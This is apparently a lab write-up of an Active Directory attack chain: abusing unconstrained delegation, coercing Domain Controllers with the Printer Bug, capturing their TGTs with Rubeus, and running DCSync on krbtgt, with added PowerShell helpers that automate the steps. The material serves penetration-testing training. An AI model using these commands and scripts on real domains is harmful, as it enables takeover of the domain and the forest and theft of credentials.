
Unconstrained Delegation

1. Attack Overview

This attack chain exploits hosts configured with Unconstrained Delegation. When a user or computer authenticates to a service on such a host with Kerberos, the KDC embeds a forwardable copy of the client's TGT (Ticket Granting Ticket) in the service ticket, and the host caches that TGT in LSASS memory. Using the Printer Bug (MS-RPRN) we can "coerce" a Domain Controller into authenticating to our compromised host, which hands us the DC computer account's TGT. This works because computer accounts, including DC$ accounts, are delegatable by default (only accounts marked "sensitive and cannot be delegated" or placed in Protected Users are exempt), and a DC computer account holds the replication rights needed for DCSync.

2. Phase 1: Enumeration & Initial Compromise

Identify targets with Unconstrained Delegation enabled:

Get-DomainComputer -Unconstrained
Get-DomainComputer -Unconstrained | select -ExpandProperty name

Target found: DCORP-APPSRV. Note that the Domain Controllers also appear in this output, because DCs are trusted for delegation by default; they are not the target here.
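The same enumeration without PowerView, as an added example that is not part of the original lab notes: PowerView's -Unconstrained switch is just a test of the TRUSTED_FOR_DELEGATION bit in userAccountControl, so a raw LDAP query from any domain-joined host gives the same list. Domain Controllers are filtered out by default (they always match), and the function name and the last-logon column are my own additions.

```powershell
# Added example (not part of the original lab notes): the same enumeration that
# PowerView's "Get-DomainComputer -Unconstrained" does, written against raw LDAP so it
# works from any domain-joined host with no extra tooling. Assumes the caller is a
# domain user (any authenticated user can read userAccountControl).

function Get-UnconstrainedDelegationHost {
    param(
        # Distinguished name to search under; defaults to the current domain.
        [string]$SearchBase = ([string]([ADSI]"LDAP://RootDSE").defaultNamingContext),
        # DCs are trusted for delegation by design and always match; hide them unless asked.
        [switch]$IncludeDomainControllers
    )

    # userAccountControl bit TRUSTED_FOR_DELEGATION = 0x80000 (524288).
    # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule.
    $filter = '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))'
    if (-not $IncludeDomainControllers) {
        # primaryGroupID 516 = Domain Controllers, 521 = Read-only Domain Controllers.
        $filter = "(&$filter(!(primaryGroupID=516))(!(primaryGroupID=521)))"
    }

    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://$SearchBase"
    $searcher.Filter     = $filter
    $searcher.PageSize   = 1000
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@(
        'samaccountname', 'dnshostname', 'operatingsystem', 'lastlogontimestamp'))

    # Attributes may be absent on some objects; return $null instead of throwing.
    function first($c) { if ($c -and $c.Count -gt 0) { $c[0] } else { $null } }

    foreach ($r in $searcher.FindAll()) {
        $p = $r.Properties
        $lastLogon = first $p['lastlogontimestamp']
        # A box nobody has logged on to for months is a poor target: no tickets flow to it.
        $lastLogonDt = if ($lastLogon) { [datetime]::FromFileTime([int64]$lastLogon) } else { $null }
        [pscustomobject]@{
            SamAccountName  = [string](first $p['samaccountname'])
            DnsHostName     = [string](first $p['dnshostname'])
            OperatingSystem = [string](first $p['operatingsystem'])
            LastLogon       = $lastLogonDt
        }
    }
}

# Usage: list candidate hosts (DCORP-APPSRV in this lab), most recently used first.
Get-UnconstrainedDelegationHost | Sort-Object LastLogon -Descending | Format-Table -AutoSize
```

Pass -SearchBase 'DC=moneycorp,DC=local' to run the same query against the parent domain once you have a foothold there; pass -IncludeDomainControllers to see the DCs too, which is useful when you are auditing rather than attacking.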

Prerequisite: you need Local Admin rights on the target server, because reading other logon sessions' tickets out of LSASS (Rubeus monitor or dump) is a privileged operation. In this lab we used appadmin's AES key to obtain a TGT and then PSRemoting (winrs) onto the box:

# Get a TGT for the local admin
Rubeus.exe asktgt /user:appadmin /aes256:<HASH> /ptt

# Enter the session
winrs -r:dcorp-appsrv cmd

3. Phase 2: Compromising the Child Domain (dollarcorp)

Target: the child domain's Domain Controller, dcorp-dc.

Start Rubeus monitor on dcorp-appsrv (inside the winrs session) to catch the incoming TGT. /targetuser filters to the DC's computer account so other users' tickets are not printed, and /nowrap prints the Base64 blob on a single line so it can be copied cleanly:

Rubeus.exe monitor /targetuser:DCORP-DC$ /interval:5 /nowrap

Trigger the Printer Bug from your Student VM. The first argument is the server to coerce (the DC, whose Print Spooler must be running), the second is the host it will be told to authenticate to (our unconstrained server):

MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

Pass-the-Ticket (PtT): copy the Base64 TGT from the monitor output and inject it into your current logon session on the Student VM:

Rubeus.exe ptt /ticket:<BASE64_TGT>

DCSync: with the DC$ TGT in your session you hold the replication rights of the DC computer account, so ask dcorp-dc to replicate the krbtgt secrets. The krbtgt hash gives Golden Ticket persistence over dollarcorp:

SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt"

4. Phase 3: Forest Escalation (Enterprise Admin)

To compromise the entire forest, we repeat the process but target the Parent Domain Controller (mcorp-dc). This works across the parent-child trust because TGT delegation remains enabled for trusts inside a forest, so mcorp-dc's forwardable TGT is delivered to dcorp-appsrv just like dcorp-dc's was.

Monitor for the Parent DC on dcorp-appsrv:

Rubeus.exe monitor /targetuser:MCORP-DC$ /interval:5 /nowrap

Trigger Printer Bug against Parent DC:

MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

DCSync for Enterprise Secrets: After injecting the MCORP-DC$ ticket:

SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local"
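The monitor-to-ptt step in Phase 2 and Phase 3 is the same every time, and the usual failure is reusing a stale Base64 blob. The following is an added example, not code from the original lab notes: it parses a saved Rubeus monitor log, picks the newest TGT for the wanted DC$ account, refuses it if its EndTime has passed, and builds the ptt command. It assumes the monitor output was redirected to a file and relies on Rubeus printing "User", "EndTime" and a single-line Base64 blob per ticket (KRB-CRED base64 always starts with "doI"); the function name and the sample log are mine.

```powershell
# Added example (not part of the original lab notes): pull the newest TGT for a given
# account out of a saved Rubeus monitor log, refuse it if its EndTime has passed, and
# build the ptt command. Assumes the monitor was redirected to a file, e.g.
#   Rubeus.exe monitor /targetuser:DCORP-DC$ /interval:5 /nowrap > C:\Temp\monitor.log
# and relies on Rubeus printing "User", "EndTime" and a one-line Base64 blob (KRB-CRED
# base64 always starts with "doI") for each ticket.

function Get-MonitorTicket {
    param(
        [Parameter(Mandatory)][string[]]$LogLines,   # lines of the monitor log
        [Parameter(Mandatory)][string]$TargetUser,   # e.g. 'DCORP-DC$' or 'MCORP-DC$'
        [datetime]$Now = (Get-Date)                  # injectable for offline testing
    )
    $tickets = @()
    $cur = $null
    foreach ($line in $LogLines) {
        switch -Regex ($line) {
            '^\s*User\s*:\s*(\S+)'        { $cur = [ordered]@{ User = $Matches[1] } }
            '^\s*EndTime\s*:\s*(.+?)\s*$' { if ($cur) { $cur.EndTime = [datetime]::Parse($Matches[1], [cultureinfo]::InvariantCulture) } }
            '^\s*Flags\s*:\s*(.+?)\s*$'   { if ($cur) { $cur.Flags = $Matches[1] } }
            '^\s*(doI[A-Za-z0-9+/=]{20,})\s*$' {
                # The Base64 KRB-CRED line closes the record.
                if ($cur) { $cur.Ticket = $Matches[1]; $tickets += [pscustomobject]$cur; $cur = $null }
            }
        }
    }

    $wanted = $tickets |
        Where-Object { $_.User -like "$($TargetUser)@*" } |
        Sort-Object EndTime -Descending |
        Select-Object -First 1
    if (-not $wanted) {
        throw "No TGT for $TargetUser in the log. Is monitor running with the right /targetuser, and did MS-RPRN.exe fire?"
    }
    if ($wanted.EndTime -le $Now) {
        throw "TGT for $($wanted.User) expired at $($wanted.EndTime). Re-run MS-RPRN.exe to coerce a fresh one."
    }
    [pscustomobject]@{
        User       = $wanted.User
        EndTime    = $wanted.EndTime
        Flags      = $wanted.Flags
        PttCommand = "Rubeus.exe ptt /ticket:$($wanted.Ticket)"
    }
}

# Constructed sample log (the Base64 is a placeholder, not a real ticket).
$sampleLog = @'
[*] 11/30/2023 9:55:10 AM UTC - Found new TGT:

  User                  :  DCORP-DC$@DOLLARCORP.MONEYCORP.LOCAL
  StartTime             :  11/30/2023 12:00:00 AM
  EndTime               :  11/30/2023 10:00:00 AM
  RenewTill             :  12/7/2023 12:00:00 AM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    doIFCONSTRUCTEDSAMPLEplaceholderNOTaRealTicketAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
'@
$sampleLog = $sampleLog -split "`r?`n"

# 09:58 on the same day: still valid, so the ptt command is produced.
Get-MonitorTicket -LogLines $sampleLog -TargetUser 'DCORP-DC$' -Now ([datetime]'2023-11-30T09:58:00')
# A day later the same call throws "expired": re-trigger MS-RPRN.exe instead of reusing the blob.

# Live use on the Student VM after copying the log over:
# $t = Get-MonitorTicket -LogLines (Get-Content C:\Temp\monitor.log) -TargetUser 'MCORP-DC$'
# Invoke-Expression $t.PttCommand
```

The EndTime check is the point of the helper: Rubeus ptt happily injects an expired ticket and only the next Kerberos request fails, so checking the lifetime before injection saves a confusing round of DCSync errors.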

5. Troubleshooting & Mental Models

The "Time" Factor (Error 1398)

Kerberos rejects tickets when the two clocks differ by more than the domain's MaxClockSkew, which is 5 minutes by default. Error 1398 (ERROR_TIME_SKEW) means your Student VM's clock is off against the DC: the injection itself appears to succeed, but every use of the ticket (the DCSync in particular) fails until the clock is corrected.

Fix (requires local admin on the Student VM, since setting the system time is privileged): net time \\dcorp-dc.dollarcorp.moneycorp.local /set /y
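A pre-flight check that measures the skew before you inject anything, as an added example that is not part of the original lab notes. It uses w32tm /stripchart, which needs no admin rights, parses the offset line Windows prints ("HH:mm:ss, +00.0123456s"), and compares it with the 300-second Kerberos default. The function name and the sample output are my own.

```powershell
# Added example (not part of the original lab notes): pre-flight check of the clock
# offset between this host and the KDC before running ptt. Uses w32tm /stripchart,
# which does not need admin rights; the offset line format "HH:mm:ss, +00.0123456s" is
# what w32tm prints, and 300 s is the Kerberos default MaxClockSkew.

function Test-KerberosClockSkew {
    param(
        [Parameter(Mandatory)][string]$Kdc,     # e.g. dcorp-dc.dollarcorp.moneycorp.local
        [int]$MaxSkewSeconds = 300,
        [string[]]$StripchartOutput            # optional: captured output, for offline use
    )
    if (-not $StripchartOutput) {
        # One sample is enough; /dataonly suppresses the ASCII chart.
        $StripchartOutput = & w32tm.exe /stripchart /computer:$Kdc /samples:1 /dataonly 2>&1
    }
    $text = ($StripchartOutput | ForEach-Object { "$_" }) -join "`n"
    $m = [regex]::Match($text, ',\s*([+-]\d+\.\d+)s')
    if (-not $m.Success) {
        throw "Could not read a time offset from w32tm output for ${Kdc}:`n$text"
    }
    # Offset between the local clock and the DC, in seconds (sign shows direction).
    $offset = [double]::Parse($m.Groups[1].Value, [cultureinfo]::InvariantCulture)
    $ok  = [math]::Abs($offset) -lt $MaxSkewSeconds
    $fix = if ($ok) { $null } else { "net time \\$Kdc /set /y   (needs local admin on this VM)" }
    [pscustomobject]@{
        Kdc           = $Kdc
        OffsetSeconds = $offset
        WithinSkew    = $ok
        Fix           = $fix
    }
}

# Constructed w32tm output (address and values made up) showing a 412 s offset,
# well outside the 5-minute window.
$sample = @(
    'Tracking dcorp-dc.dollarcorp.moneycorp.local [10.0.0.1:123].',
    'The current time is 11/30/2023 9:58:00 AM.',
    '09:58:00, +412.0312500s'
)
Test-KerberosClockSkew -Kdc 'dcorp-dc.dollarcorp.moneycorp.local' -StripchartOutput $sample
# WithinSkew is False and Fix holds the net time command.

# Live check on the Student VM before ptt:
# Test-KerberosClockSkew -Kdc 'dcorp-dc.dollarcorp.moneycorp.local'
```

Run the check against whichever DC you are about to DCSync (mcorp-dc in Phase 3); an offset that is fine against the child DC can still be out of tolerance against the parent if the two are not synchronised.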

The "Expiration" Factor

A TGT captured via monitor carries its own EndTime, which the monitor output prints next to the Base64 blob (the default TGT lifetime is 10 hours). A Base64 string saved from a previous lab session has therefore expired; Rubeus ptt will still inject it, but Kerberos will refuse to use it.

Fix: re-run MS-RPRN.exe to coerce a fresh ticket every time you restart the attack, and copy the new blob from the monitor output.

Why does it work?

  • Coercion: MS-RPRN makes the DC's computer account authenticate to our server, using Kerberos, without any interaction from an admin.

  • Delegation: because our server is trusted for unconstrained delegation, the KDC includes a forwardable copy of the DC's TGT in that service ticket, and the server caches it in LSASS where Rubeus monitor picks it up.

  • Impersonation: with that TGT in our own session we are the DC as far as Kerberos is concerned, and DC computer accounts hold the replication rights, so we can ask for the directory database (DCSync).